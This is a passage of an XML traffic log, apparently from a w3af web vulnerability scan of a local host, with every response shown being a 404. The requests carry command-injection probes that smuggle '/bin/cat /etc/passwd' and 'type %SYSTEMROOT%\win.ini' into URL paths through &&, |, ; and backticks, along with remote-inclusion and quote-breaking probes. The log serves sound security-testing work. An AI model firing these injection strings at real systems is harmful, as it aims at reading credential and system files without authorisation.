                    <status>GET http://192.168.0.116:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="258">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="259">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="259">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="260">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="260">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="261">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="261">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="262">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="262">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="267">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="267">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="268">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="268">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="269">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="269">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="270">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="271">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="271">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="272">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="272">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="273">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="273">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="275">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="275">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="291">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/XWPfLmxj HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="291">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="304">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="304">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="305">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="305">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="306">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="306">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="307">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="307">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="308">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="308">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="309">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
